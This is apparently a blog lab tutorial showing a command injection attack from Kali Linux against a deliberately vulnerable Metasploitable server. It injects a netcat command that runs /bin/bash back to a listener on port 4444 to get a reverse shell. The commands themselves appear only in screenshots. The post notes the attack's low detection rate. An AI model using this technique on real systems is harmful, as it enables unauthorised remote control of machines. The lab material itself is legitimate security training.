COMMAND INJECTION (II): REVERSE SHELL CONNECTION WITH NETCAT
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqJkOS7y2yxJRn1SWqE95kYpFW-H6qgDFuZKY1nFdjheTsPbCcikqVDHVx737wBnZLQCWeOyIbBe1HOvgaGSIujt5eWMCHMiQsu697veIyDEJhqEJxEO8mlFHqnSeAkt4DGVOIJZGBwDEz/s1600/screenshot.27.jpg)
- This exercise is based on the previous one:
http://www.whitelist1.com/2018/04/command-injection-attack.html
- Now, the goal is to perform a Command Injection attack from the web browser of the attacker Kali Linux against a victim Metasplotaible, injecting NetCat commands:
https://en.wikipedia.org/wiki/Netcat
- Three of the most interesting characteristics of this attack are:
- No file is uploaded to the victim so the detection rate would be low
- No need of writable permissions over the web server folder on the victim's side
- The tool (NetCat) is usually present in most of the Linux/Windows machines
- First, let check that ci.php (allows Command Injection due to lack of input sanitization, as seen at previous exercise) is available at the victim side Metasploitable's web server folder /var/www:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggEs7DQ4JWDYt_UZn-IPSPkCjL8ELD8LLOX3uSR7wQkS6Kv193SFiPCL3TMvCF7tEQ7hkpCQqpBd7KKpNpI4vixCDEZjVXaXFqcnhayZ2mnBxbHKVhH6UVM-_xp8irHlTSqbBGBiY_5HQq/s1600/screenshot.18.jpg)
- From Kali:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXvB616ZlY8XZygrniAZAJ2-uk7jfx4ltqJEz6qE9s_GfkLseKYJ7LRx5yCvNREAmydjDu8clcSE3UcUMqLIQsNYQI69V15aNwxE4YL24aTq68M9SVzN-Gdb9HOWEv2RQLbJn97GSbv_3g/s1600/screenshot.19.jpg)
- NetCat (nc) has two options (-c and -e), considered dangerous by the program itself, that execute commands remotely:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxYpXnodUKSlKIFu1vXvtUi3cFwzoIEXG1JVhMg_ldNYV6I_ZD8FepVfQeNtjwXzsmXVwaAE8vFyhKsJwMedNdz5aW0ZKF_J7h50eGgrTp8aQWvWKMP3bAC_K9XQ88ZqOlr3YNRiJzi5du/s1600/screenshot.17.jpg)
- Setting a listening session on port 4444 at the attacker side:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqaJkEetonegogi-KlS10JOJmLYI58pYWgZIEOIzx90JoUYtYw__8JR9jaOUIqg0xZZEBK8DoqUdSpoP_dZPTXRGoDWdXH_XHmq1Vd1f5Cn3QwZyaK4fIuI626wypIie0lQmNzph1yErOJ/s400/screenshot.20.jpg)
- Now, entering through Kali's browser the NetCat command which executes (-e) remotely a shell (/bin/bash):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikncVB5jZbPv0dSUQftMuOpBsmWCiBT_TyJB6JwJqQHaiQu8LHcbFiAkNU7A2srhu057Cv351hvll9Pxk-Q9j_12w676idcxx1E6GPkAITnpDAZ3DR3r_W-rqGrD28ipp6eoh0jZfzjckg/s1600/screenshot.22.jpg)
- It is interesting to notice the Connecting notification, meaning it is waiting to the connection at the other side:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgppZlYT81XudCoSW1OkYMhaTMPA5QEYyGVDyAhr_c9zb9ubudHVP5AhN3y5Ct3FlMUY4gPyXede9Vt9EM9fWkDTH4eosjFAbWpbpLzizBgvpRlMUxBHD0lp-QwWshtgMhmtM8pJ2L-Mmmy/s400/screenshot.24.jpg)
- Finally the attacker Kali achieves a reverse shell connection from the Metasploitable victim's side:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjisLV6X20to3-y4JTsxxMBdDOnwsNVoDv3ecb5t7Chyphenhyphen7gTk7bly0F6jSGBtKOOlawS9KzryfN7uTEQedKugarldNgJbM8qyZCrqZ5HvqSLgdvCupe3n5gd6WfCmv6d7kyIwZmQaNW6J4gs/s1600/screenshot.23.jpg)